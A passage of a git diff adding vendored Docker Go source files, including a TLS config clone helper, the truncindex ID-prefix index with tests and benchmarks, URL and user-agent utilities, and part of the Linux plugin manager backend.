b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go new file mode 100644 index 0000000000..0d5b448fec --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go @@ -0,0 +1,33 @@ +// +build go1.7,!go1.8 + +package tlsconfig + +import "crypto/tls" + +// Clone returns a clone of tls.Config. This function is provided for +// compatibility for go1.7 that doesn't include this method in stdlib. +func Clone(c *tls.Config) *tls.Config { + return &tls.Config{ + Rand: c.Rand, + Time: c.Time, + Certificates: c.Certificates, + NameToCertificate: c.NameToCertificate, + GetCertificate: c.GetCertificate, + RootCAs: c.RootCAs, + NextProtos: c.NextProtos, + ServerName: c.ServerName, + ClientAuth: c.ClientAuth, + ClientCAs: c.ClientCAs, + InsecureSkipVerify: c.InsecureSkipVerify, + CipherSuites: c.CipherSuites, + PreferServerCipherSuites: c.PreferServerCipherSuites, + SessionTicketsDisabled: c.SessionTicketsDisabled, + SessionTicketKey: c.SessionTicketKey, + ClientSessionCache: c.ClientSessionCache, + MinVersion: c.MinVersion, + MaxVersion: c.MaxVersion, + CurvePreferences: c.CurvePreferences, + DynamicRecordSizingDisabled: c.DynamicRecordSizingDisabled, + Renegotiation: c.Renegotiation, + } +} diff --git a/vendor/github.com/docker/docker/pkg/truncindex/truncindex.go b/vendor/github.com/docker/docker/pkg/truncindex/truncindex.go new file mode 100644 index 0000000000..02610b8b7e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/truncindex/truncindex.go @@ -0,0 +1,137 @@ +// Package truncindex provides a general 'index tree', used by Docker +// in order to be able to reference containers by only a few unambiguous +// characters of their id. +package truncindex + +import ( + "errors" + "fmt" + "strings" + "sync" + + "github.com/tchap/go-patricia/patricia" +) + +var ( + // ErrEmptyPrefix is an error returned if the prefix was empty. + ErrEmptyPrefix = errors.New("Prefix can't be empty") + + // ErrIllegalChar is returned when a space is in the ID + ErrIllegalChar = errors.New("illegal character: ' '") + + // ErrNotExist is returned when ID or its prefix not found in index. + ErrNotExist = errors.New("ID does not exist") +) + +// ErrAmbiguousPrefix is returned if the prefix was ambiguous +// (multiple ids for the prefix). +type ErrAmbiguousPrefix struct { + prefix string +} + +func (e ErrAmbiguousPrefix) Error() string { + return fmt.Sprintf("Multiple IDs found with provided prefix: %s", e.prefix) +} + +// TruncIndex allows the retrieval of string identifiers by any of their unique prefixes. +// This is used to retrieve image and container IDs by more convenient shorthand prefixes. +type TruncIndex struct { + sync.RWMutex + trie *patricia.Trie + ids map[string]struct{} +} + +// NewTruncIndex creates a new TruncIndex and initializes with a list of IDs. +func NewTruncIndex(ids []string) (idx *TruncIndex) { + idx = &TruncIndex{ + ids: make(map[string]struct{}), + + // Change patricia max prefix per node length, + // because our len(ID) always 64 + trie: patricia.NewTrie(patricia.MaxPrefixPerNode(64)), + } + for _, id := range ids { + idx.addID(id) + } + return +} + +func (idx *TruncIndex) addID(id string) error { + if strings.Contains(id, " ") { + return ErrIllegalChar + } + if id == "" { + return ErrEmptyPrefix + } + if _, exists := idx.ids[id]; exists { + return fmt.Errorf("id already exists: '%s'", id) + } + idx.ids[id] = struct{}{} + if inserted := idx.trie.Insert(patricia.Prefix(id), struct{}{}); !inserted { + return fmt.Errorf("failed to insert id: %s", id) + } + return nil +} + +// Add adds a new ID to the TruncIndex. +func (idx *TruncIndex) Add(id string) error { + idx.Lock() + defer idx.Unlock() + if err := idx.addID(id); err != nil { + return err + } + return nil +} + +// Delete removes an ID from the TruncIndex. If there are multiple IDs +// with the given prefix, an error is thrown. +func (idx *TruncIndex) Delete(id string) error { + idx.Lock() + defer idx.Unlock() + if _, exists := idx.ids[id]; !exists || id == "" { + return fmt.Errorf("no such id: '%s'", id) + } + delete(idx.ids, id) + if deleted := idx.trie.Delete(patricia.Prefix(id)); !deleted { + return fmt.Errorf("no such id: '%s'", id) + } + return nil +} + +// Get retrieves an ID from the TruncIndex. If there are multiple IDs +// with the given prefix, an error is thrown. +func (idx *TruncIndex) Get(s string) (string, error) { + if s == "" { + return "", ErrEmptyPrefix + } + var ( + id string + ) + subTreeVisitFunc := func(prefix patricia.Prefix, item patricia.Item) error { + if id != "" { + // we haven't found the ID if there are two or more IDs + id = "" + return ErrAmbiguousPrefix{prefix: string(prefix)} + } + id = string(prefix) + return nil + } + + idx.RLock() + defer idx.RUnlock() + if err := idx.trie.VisitSubtree(patricia.Prefix(s), subTreeVisitFunc); err != nil { + return "", err + } + if id != "" { + return id, nil + } + return "", ErrNotExist +} + +// Iterate iterates over all stored IDs, and passes each of them to the given handler. +func (idx *TruncIndex) Iterate(handler func(id string)) { + idx.trie.Visit(func(prefix patricia.Prefix, item patricia.Item) error { + handler(string(prefix)) + return nil + }) +} diff --git a/vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go b/vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go new file mode 100644 index 0000000000..8197baf7d4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go @@ -0,0 +1,429 @@ +package truncindex + +import ( + "math/rand" + "testing" + + "github.com/docker/docker/pkg/stringid" +) + +// Test the behavior of TruncIndex, an index for querying IDs from a non-conflicting prefix. +func TestTruncIndex(t *testing.T) { + ids := []string{} + index := NewTruncIndex(ids) + // Get on an empty index + if _, err := index.Get("foobar"); err == nil { + t.Fatal("Get on an empty index should return an error") + } + + // Spaces should be illegal in an id + if err := index.Add("I have a space"); err == nil { + t.Fatalf("Adding an id with ' ' should return an error") + } + + id := "99b36c2c326ccc11e726eee6ee78a0baf166ef96" + // Add an id + if err := index.Add(id); err != nil { + t.Fatal(err) + } + + // Add an empty id (should fail) + if err := index.Add(""); err == nil { + t.Fatalf("Adding an empty id should return an error") + } + + // Get a non-existing id + assertIndexGet(t, index, "abracadabra", "", true) + // Get an empty id + assertIndexGet(t, index, "", "", true) + // Get the exact id + assertIndexGet(t, index, id, id, false) + // The first letter should match + assertIndexGet(t, index, id[:1], id, false) + // The first half should match + assertIndexGet(t, index, id[:len(id)/2], id, false) + // The second half should NOT match + assertIndexGet(t, index, id[len(id)/2:], "", true) + + id2 := id[:6] + "blabla" + // Add an id + if err := index.Add(id2); err != nil { + t.Fatal(err) + } + // Both exact IDs should work + assertIndexGet(t, index, id, id, false) + assertIndexGet(t, index, id2, id2, false) + + // 6 characters or less should conflict + assertIndexGet(t, index, id[:6], "", true) + assertIndexGet(t, index, id[:4], "", true) + assertIndexGet(t, index, id[:1], "", true) + + // An ambiguous id prefix should return an error + if _, err := index.Get(id[:4]); err == nil { + t.Fatal("An ambiguous id prefix should return an error") + } + + // 7 characters should NOT conflict + assertIndexGet(t, index, id[:7], id, false) + assertIndexGet(t, index, id2[:7], id2, false) + + // Deleting a non-existing id should return an error + if err := index.Delete("non-existing"); err == nil { + t.Fatalf("Deleting a non-existing id should return an error") + } + + // Deleting an empty id should return an error + if err := index.Delete(""); err == nil { + t.Fatal("Deleting an empty id should return an error") + } + + // Deleting id2 should remove conflicts + if err := index.Delete(id2); err != nil { + t.Fatal(err) + } + // id2 should no longer work + assertIndexGet(t, index, id2, "", true) + assertIndexGet(t, index, id2[:7], "", true) + assertIndexGet(t, index, id2[:11], "", true) + + // conflicts between id and id2 should be gone + assertIndexGet(t, index, id[:6], id, false) + assertIndexGet(t, index, id[:4], id, false) + assertIndexGet(t, index, id[:1], id, false) + + // non-conflicting substrings should still not conflict + assertIndexGet(t, index, id[:7], id, false) + assertIndexGet(t, index, id[:15], id, false) + assertIndexGet(t, index, id, id, false) + + assertIndexIterate(t) +} + +func assertIndexIterate(t *testing.T) { + ids := []string{ + "19b36c2c326ccc11e726eee6ee78a0baf166ef96", + "28b36c2c326ccc11e726eee6ee78a0baf166ef96", + "37b36c2c326ccc11e726eee6ee78a0baf166ef96", + "46b36c2c326ccc11e726eee6ee78a0baf166ef96", + } + + index := NewTruncIndex(ids) + + index.Iterate(func(targetId string) { + for _, id := range ids { + if targetId == id { + return + } + } + + t.Fatalf("An unknown ID '%s'", targetId) + }) +} + +func assertIndexGet(t *testing.T, index *TruncIndex, input, expectedResult string, expectError bool) { + if result, err := index.Get(input); err != nil && !expectError { + t.Fatalf("Unexpected error getting '%s': %s", input, err) + } else if err == nil && expectError { + t.Fatalf("Getting '%s' should return an error, not '%s'", input, result) + } else if result != expectedResult { + t.Fatalf("Getting '%s' returned '%s' instead of '%s'", input, result, expectedResult) + } +} + +func BenchmarkTruncIndexAdd100(b *testing.B) { + var testSet []string + for i := 0; i < 100; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + } + } +} + +func BenchmarkTruncIndexAdd250(b *testing.B) { + var testSet []string + for i := 0; i < 250; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + } + } +} + +func BenchmarkTruncIndexAdd500(b *testing.B) { + var testSet []string + for i := 0; i < 500; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + } + } +} + +func BenchmarkTruncIndexGet100(b *testing.B) { + var testSet []string + var testKeys []string + for i := 0; i < 100; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + l := rand.Intn(12) + 12 + testKeys = append(testKeys, id[:l]) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + for _, id := range testKeys { + if res, err := index.Get(id); err != nil { + b.Fatal(res, err) + } + } + } +} + +func BenchmarkTruncIndexGet250(b *testing.B) { + var testSet []string + var testKeys []string + for i := 0; i < 250; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + l := rand.Intn(12) + 12 + testKeys = append(testKeys, id[:l]) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + for _, id := range testKeys { + if res, err := index.Get(id); err != nil { + b.Fatal(res, err) + } + } + } +} + +func BenchmarkTruncIndexGet500(b *testing.B) { + var testSet []string + var testKeys []string + for i := 0; i < 500; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + l := rand.Intn(12) + 12 + testKeys = append(testKeys, id[:l]) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + for _, id := range testKeys { + if res, err := index.Get(id); err != nil { + b.Fatal(res, err) + } + } + } +} + +func BenchmarkTruncIndexDelete100(b *testing.B) { + var testSet []string + for i := 0; i < 100; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + b.StopTimer() + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + } + b.StartTimer() + for _, id := range testSet { + if err := index.Delete(id); err != nil { + b.Fatal(err) + } + } + } +} + +func BenchmarkTruncIndexDelete250(b *testing.B) { + var testSet []string + for i := 0; i < 250; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + b.StopTimer() + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + } + b.StartTimer() + for _, id := range testSet { + if err := index.Delete(id); err != nil { + b.Fatal(err) + } + } + } +} + +func BenchmarkTruncIndexDelete500(b *testing.B) { + var testSet []string + for i := 0; i < 500; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + b.StopTimer() + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + } + b.StartTimer() + for _, id := range testSet { + if err := index.Delete(id); err != nil { + b.Fatal(err) + } + } + } +} + +func BenchmarkTruncIndexNew100(b *testing.B) { + var testSet []string + for i := 0; i < 100; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + NewTruncIndex(testSet) + } +} + +func BenchmarkTruncIndexNew250(b *testing.B) { + var testSet []string + for i := 0; i < 250; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + NewTruncIndex(testSet) + } +} + +func BenchmarkTruncIndexNew500(b *testing.B) { + var testSet []string + for i := 0; i < 500; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + NewTruncIndex(testSet) + } +} + +func BenchmarkTruncIndexAddGet100(b *testing.B) { + var testSet []string + var testKeys []string + for i := 0; i < 500; i++ { + id := stringid.GenerateNonCryptoID() + testSet = append(testSet, id) + l := rand.Intn(12) + 12 + testKeys = append(testKeys, id[:l]) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + } + for _, id := range testKeys { + if res, err := index.Get(id); err != nil { + b.Fatal(res, err) + } + } + } +} + +func BenchmarkTruncIndexAddGet250(b *testing.B) { + var testSet []string + var testKeys []string + for i := 0; i < 500; i++ { + id := stringid.GenerateNonCryptoID() + testSet = append(testSet, id) + l := rand.Intn(12) + 12 + testKeys = append(testKeys, id[:l]) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + } + for _, id := range testKeys { + if res, err := index.Get(id); err != nil { + b.Fatal(res, err) + } + } + } +} + +func BenchmarkTruncIndexAddGet500(b *testing.B) { + var testSet []string + var testKeys []string + for i := 0; i < 500; i++ { + id := stringid.GenerateNonCryptoID() + testSet = append(testSet, id) + l := rand.Intn(12) + 12 + testKeys = append(testKeys, id[:l]) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + } + for _, id := range testKeys { + if res, err := index.Get(id); err != nil { + b.Fatal(res, err) + } + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/urlutil/urlutil.go b/vendor/github.com/docker/docker/pkg/urlutil/urlutil.go new file mode 100644 index 0000000000..44152873b1 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/urlutil/urlutil.go @@ -0,0 +1,50 @@ +// Package urlutil provides helper function to check urls kind. +// It supports http urls, git urls and transport url (tcp://, …) +package urlutil + +import ( + "regexp" + "strings" +) + +var ( + validPrefixes = map[string][]string{ + "url": {"http://", "https://"}, + "git": {"git://", "github.com/", "git@"}, + "transport": {"tcp://", "tcp+tls://", "udp://", "unix://", "unixgram://"}, + } + urlPathWithFragmentSuffix = regexp.MustCompile(".git(?:#.+)?$") +) + +// IsURL returns true if the provided str is an HTTP(S) URL. +func IsURL(str string) bool { + return checkURL(str, "url") +} + +// IsGitURL returns true if the provided str is a git repository URL. +func IsGitURL(str string) bool { + if IsURL(str) && urlPathWithFragmentSuffix.MatchString(str) { + return true + } + return checkURL(str, "git") +} + +// IsGitTransport returns true if the provided str is a git transport by inspecting +// the prefix of the string for known protocols used in git. +func IsGitTransport(str string) bool { + return IsURL(str) || strings.HasPrefix(str, "git://") || strings.HasPrefix(str, "git@") +} + +// IsTransportURL returns true if the provided str is a transport (tcp, tcp+tls, udp, unix) URL. +func IsTransportURL(str string) bool { + return checkURL(str, "transport") +} + +func checkURL(str, kind string) bool { + for _, prefix := range validPrefixes[kind] { + if strings.HasPrefix(str, prefix) { + return true + } + } + return false +} diff --git a/vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go b/vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go new file mode 100644 index 0000000000..75eb464fe5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go @@ -0,0 +1,70 @@ +package urlutil + +import "testing" + +var ( + gitUrls = []string{ + "git://github.com/docker/docker", + "git@github.com:docker/docker.git", + "git@bitbucket.org:atlassianlabs/atlassian-docker.git", + "https://github.com/docker/docker.git", + "http://github.com/docker/docker.git", + "http://github.com/docker/docker.git#branch", + "http://github.com/docker/docker.git#:dir", + } + incompleteGitUrls = []string{ + "github.com/docker/docker", + } + invalidGitUrls = []string{ + "http://github.com/docker/docker.git:#branch", + } + transportUrls = []string{ + "tcp://example.com", + "tcp+tls://example.com", + "udp://example.com", + "unix:///example", + "unixgram:///example", + } +) + +func TestValidGitTransport(t *testing.T) { + for _, url := range gitUrls { + if IsGitTransport(url) == false { + t.Fatalf("%q should be detected as valid Git prefix", url) + } + } + + for _, url := range incompleteGitUrls { + if IsGitTransport(url) == true { + t.Fatalf("%q should not be detected as valid Git prefix", url) + } + } +} + +func TestIsGIT(t *testing.T) { + for _, url := range gitUrls { + if IsGitURL(url) == false { + t.Fatalf("%q should be detected as valid Git url", url) + } + } + + for _, url := range incompleteGitUrls { + if IsGitURL(url) == false { + t.Fatalf("%q should be detected as valid Git url", url) + } + } + + for _, url := range invalidGitUrls { + if IsGitURL(url) == true { + t.Fatalf("%q should not be detected as valid Git prefix", url) + } + } +} + +func TestIsTransport(t *testing.T) { + for _, url := range transportUrls { + if IsTransportURL(url) == false { + t.Fatalf("%q should be detected as valid Transport url", url) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/useragent/README.md b/vendor/github.com/docker/docker/pkg/useragent/README.md new file mode 100644 index 0000000000..d9cb367d10 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/useragent/README.md @@ -0,0 +1 @@ +This package provides helper functions to pack version information into a single User-Agent header. diff --git a/vendor/github.com/docker/docker/pkg/useragent/useragent.go b/vendor/github.com/docker/docker/pkg/useragent/useragent.go new file mode 100644 index 0000000000..1137db51b8 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/useragent/useragent.go @@ -0,0 +1,55 @@ +// Package useragent provides helper functions to pack +// version information into a single User-Agent header. +package useragent + +import ( + "strings" +) + +// VersionInfo is used to model UserAgent versions. +type VersionInfo struct { + Name string + Version string +} + +func (vi *VersionInfo) isValid() bool { + const stopChars = " \t\r\n/" + name := vi.Name + vers := vi.Version + if len(name) == 0 || strings.ContainsAny(name, stopChars) { + return false + } + if len(vers) == 0 || strings.ContainsAny(vers, stopChars) { + return false + } + return true +} + +// AppendVersions converts versions to a string and appends the string to the string base. +// +// Each VersionInfo will be converted to a string in the format of +// "product/version", where the "product" is get from the name field, while +// version is get from the version field. Several pieces of version information +// will be concatenated and separated by space. +// +// Example: +// AppendVersions("base", VersionInfo{"foo", "1.0"}, VersionInfo{"bar", "2.0"}) +// results in "base foo/1.0 bar/2.0". +func AppendVersions(base string, versions ...VersionInfo) string { + if len(versions) == 0 { + return base + } + + verstrs := make([]string, 0, 1+len(versions)) + if len(base) > 0 { + verstrs = append(verstrs, base) + } + + for _, v := range versions { + if !v.isValid() { + continue + } + verstrs = append(verstrs, v.Name+"/"+v.Version) + } + return strings.Join(verstrs, " ") +} diff --git a/vendor/github.com/docker/docker/pkg/useragent/useragent_test.go b/vendor/github.com/docker/docker/pkg/useragent/useragent_test.go new file mode 100644 index 0000000000..0ad7243a6d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/useragent/useragent_test.go @@ -0,0 +1,31 @@ +package useragent + +import "testing" + +func TestVersionInfo(t *testing.T) { + vi := VersionInfo{"foo", "bar"} + if !vi.isValid() { + t.Fatalf("VersionInfo should be valid") + } + vi = VersionInfo{"", "bar"} + if vi.isValid() { + t.Fatalf("Expected VersionInfo to be invalid") + } + vi = VersionInfo{"foo", ""} + if vi.isValid() { + t.Fatalf("Expected VersionInfo to be invalid") + } +} + +func TestAppendVersions(t *testing.T) { + vis := []VersionInfo{ + {"foo", "1.0"}, + {"bar", "0.1"}, + {"pi", "3.1.4"}, + } + v := AppendVersions("base", vis...) + expect := "base foo/1.0 bar/0.1 pi/3.1.4" + if v != expect { + t.Fatalf("expected %q, got %q", expect, v) + } +} diff --git a/vendor/github.com/docker/docker/plugin/backend_linux.go b/vendor/github.com/docker/docker/plugin/backend_linux.go new file mode 100644 index 0000000000..33200d8efa --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/backend_linux.go @@ -0,0 +1,790 @@ +// +build linux + +package plugin + +import ( + "archive/tar" + "compress/gzip" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net/http" + "os" + "path" + "path/filepath" + "sort" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/distribution/manifest/schema2" + "github.com/docker/docker/api/types" + "github.com/docker/docker/distribution" + progressutils "github.com/docker/docker/distribution/utils" + "github.com/docker/docker/distribution/xfer" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/pools" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/plugin/v2" + "github.com/docker/docker/reference" + "github.com/pkg/errors" + "golang.org/x/net/context" +) + +// Disable deactivates a plugin. This means resources (volumes, networks) cant use them. +func (pm *Manager) Disable(refOrID string, config *types.PluginDisableConfig) error { + p, err := pm.config.Store.GetV2Plugin(refOrID) + if err != nil { + return err + } + pm.mu.RLock() + c := pm.cMap[p] + pm.mu.RUnlock() + + if !config.ForceDisable && p.GetRefCount() > 0 { + return fmt.Errorf("plugin %s is in use", p.Name()) + } + + if err := pm.disable(p, c); err != nil { + return err + } + pm.config.LogPluginEvent(p.GetID(), refOrID, "disable") + return nil +} + +// Enable activates a plugin, which implies that they are ready to be used by containers. +func (pm *Manager) Enable(refOrID string, config *types.PluginEnableConfig) error { + p, err := pm.config.Store.GetV2Plugin(refOrID) + if err != nil { + return err + } + + c := &controller{timeoutInSecs: config.Timeout} + if err := pm.enable(p, c, false); err != nil { + return err + } + pm.config.LogPluginEvent(p.GetID(), refOrID, "enable") + return nil +} + +// Inspect examines a plugin config +func (pm *Manager) Inspect(refOrID string) (tp *types.Plugin, err error) { + p, err := pm.config.Store.GetV2Plugin(refOrID) + if err != nil { + return nil, err + } + + return &p.PluginObj, nil +} + +func (pm *Manager) pull(ctx context.Context, ref reference.Named, config *distribution.ImagePullConfig, outStream io.Writer) error { + if outStream != nil { + // Include a buffer so that slow client connections don't affect + // transfer performance. + progressChan := make(chan progress.Progress, 100) + + writesDone := make(chan struct{}) + + defer func() { + close(progressChan) + <-writesDone + }() + + var cancelFunc context.CancelFunc + ctx, cancelFunc = context.WithCancel(ctx) + + go func() { + progressutils.WriteDistributionProgress(cancelFunc, outStream, progressChan) + close(writesDone) + }() + + config.ProgressOutput = progress.ChanOutput(progressChan) + } else { + config.ProgressOutput = progress.DiscardOutput() + } + return distribution.Pull(ctx, ref, config) +} + +type tempConfigStore struct { + config []byte + configDigest digest.Digest +} + +func (s *tempConfigStore) Put(c []byte) (digest.Digest, error) { + dgst := digest.FromBytes(c) + + s.config = c + s.configDigest = dgst + + return dgst, nil +} + +func (s *tempConfigStore) Get(d digest.Digest) ([]byte, error) { + if d != s.configDigest { + return nil, digest.ErrDigestNotFound + } + return s.config, nil +} + +func (s *tempConfigStore) RootFSFromConfig(c []byte) (*image.RootFS, error) { + return configToRootFS(c) +} + +func computePrivileges(c types.PluginConfig) (types.PluginPrivileges, error) { + var privileges types.PluginPrivileges + if c.Network.Type != "null" && c.Network.Type != "bridge" && c.Network.Type != "" { + privileges = append(privileges, types.PluginPrivilege{ + Name: "network", + Description: "permissions to access a network", + Value: []string{c.Network.Type}, + }) + } + for _, mount := range c.Mounts { + if mount.Source != nil { + privileges = append(privileges, types.PluginPrivilege{ + Name: "mount", + Description: "host path to mount", + Value: []string{*mount.Source}, + }) + } + } + for _, device := range c.Linux.Devices { + if device.Path != nil { + privileges = append(privileges, types.PluginPrivilege{ + Name: "device", + Description: "host device to access", + Value: []string{*device.Path}, + }) + } + } + if c.Linux.AllowAllDevices { + privileges = append(privileges, types.PluginPrivilege{ + Name: "allow-all-devices", + Description: "allow 'rwm' access to all devices", + Value: []string{"true"}, + }) + } + if len(c.Linux.Capabilities) > 0 { + privileges = append(privileges, types.PluginPrivilege{ + Name: "capabilities", + Description: "list of additional capabilities required", + Value: c.Linux.Capabilities, + }) + } + + return privileges, nil +} + +// Privileges pulls a plugin config and computes the privileges required to install it. +func (pm *Manager) Privileges(ctx context.Context, ref reference.Named, metaHeader http.Header, authConfig *types.AuthConfig) (types.PluginPrivileges, error) { + // create image store instance + cs := &tempConfigStore{} + + // DownloadManager not defined because only pulling configuration. + pluginPullConfig := &distribution.ImagePullConfig{ + Config: distribution.Config{ + MetaHeaders: metaHeader, + AuthConfig: authConfig, + RegistryService: pm.config.RegistryService, + ImageEventLogger: func(string, string, string) {}, + ImageStore: cs, + }, + Schema2Types: distribution.PluginTypes, + } + + if err := pm.pull(ctx, ref, pluginPullConfig, nil); err != nil { + return nil, err + } + + if cs.config == nil { + return nil, errors.New("no configuration pulled") + } + var config types.PluginConfig + if err := json.Unmarshal(cs.config, &config); err != nil { + return nil, err + } + + return computePrivileges(config) +} + +// Upgrade upgrades a plugin +func (pm *Manager) Upgrade(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, outStream io.Writer) (err error) { + p, err := pm.config.Store.GetV2Plugin(name) + if err != nil { + return errors.Wrap(err, "plugin must be installed before upgrading") + } + + if p.IsEnabled() { + return fmt.Errorf("plugin must be disabled before upgrading") + } + + pm.muGC.RLock() + defer pm.muGC.RUnlock() + + // revalidate because Pull is public + nameref, err := reference.ParseNamed(name) + if err != nil { + return errors.Wrapf(err, "failed to parse %q", name) + } + name = reference.WithDefaultTag(nameref).String() + + tmpRootFSDir, err := ioutil.TempDir(pm.tmpDir(), ".rootfs") + defer os.RemoveAll(tmpRootFSDir) + + dm := &downloadManager{ + tmpDir: tmpRootFSDir, + blobStore: pm.blobStore, + } + + pluginPullConfig := &distribution.ImagePullConfig{ + Config: distribution.Config{ + MetaHeaders: metaHeader, + AuthConfig: authConfig, + RegistryService: pm.config.RegistryService, + ImageEventLogger: pm.config.LogPluginEvent, + ImageStore: dm, + }, + DownloadManager: dm, // todo: reevaluate if possible to substitute distribution/xfer dependencies instead + Schema2Types: distribution.PluginTypes, + } + + err = pm.pull(ctx, ref, pluginPullConfig, outStream) + if err != nil { + go pm.GC() + return err + } + + if err := pm.upgradePlugin(p, dm.configDigest, dm.blobs, tmpRootFSDir, &privileges); err != nil { + return err + } + p.PluginObj.PluginReference = ref.String() + return nil +} + +// Pull pulls a plugin, check if the correct privileges are provided and install the plugin. +func (pm *Manager) Pull(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, outStream io.Writer) (err error) { + pm.muGC.RLock() + defer pm.muGC.RUnlock() + + // revalidate because Pull is public + nameref, err := reference.ParseNamed(name) + if err != nil { + return errors.Wrapf(err, "failed to parse %q", name) + } + name = reference.WithDefaultTag(nameref).String() + + if err := pm.config.Store.validateName(name); err != nil { + return err + } + + tmpRootFSDir, err := ioutil.TempDir(pm.tmpDir(), ".rootfs") + defer os.RemoveAll(tmpRootFSDir) + + dm := &downloadManager{ + tmpDir: tmpRootFSDir, + blobStore: pm.blobStore, + } + + pluginPullConfig := &distribution.ImagePullConfig{ + Config: distribution.Config{ + MetaHeaders: metaHeader, + AuthConfig: authConfig, + RegistryService: pm.config.RegistryService, + ImageEventLogger: pm.config.LogPluginEvent, + ImageStore: dm, + }, + DownloadManager: dm, // todo: reevaluate if possible to substitute distribution/xfer dependencies instead + Schema2Types: distribution.PluginTypes, + } + + err = pm.pull(ctx, ref, pluginPullConfig, outStream) + if err != nil { + go pm.GC() + return err + } + + p, err := pm.createPlugin(name, dm.configDigest, dm.blobs, tmpRootFSDir, &privileges) + if err != nil { + return err + } + p.PluginObj.PluginReference = ref.String() + + return nil +} + +// List displays the list of plugins and associated metadata. +func (pm *Manager) List() ([]types.Plugin, error) { + plugins := pm.config.Store.GetAll() + out := make([]types.Plugin, 0, len(plugins)) + for _, p := range plugins { + out = append(out, p.PluginObj) + } + return out, nil +} + +// Push pushes a plugin to the store. +func (pm *Manager) Push(ctx context.Context, name string, metaHeader http.Header, authConfig *types.AuthConfig, outStream io.Writer) error { + p, err := pm.config.Store.GetV2Plugin(name) + if err != nil { + return err + } + + ref, err := reference.ParseNamed(p.Name()) + if err != nil { + return errors.Wrapf(err, "plugin has invalid name %v for push", p.Name()) + } + + var po progress.Output + if outStream != nil { + // Include a buffer so that slow client connections don't affect + // transfer performance. + progressChan := make(chan progress.Progress, 100) + + writesDone := make(chan struct{}) + + defer func() { + close(progressChan) + <-writesDone + }() + + var cancelFunc context.CancelFunc + ctx, cancelFunc = context.WithCancel(ctx) + + go func() { + progressutils.WriteDistributionProgress(cancelFunc, outStream, progressChan) + close(writesDone) + }() + + po = progress.ChanOutput(progressChan) + } else { + po = progress.DiscardOutput() + } + + // TODO: replace these with manager + is := &pluginConfigStore{ + pm: pm, + plugin: p, + } + ls := &pluginLayerProvider{ + pm: pm, + plugin: p, + } + rs := &pluginReference{ + name: ref, + pluginID: p.Config, + } + + 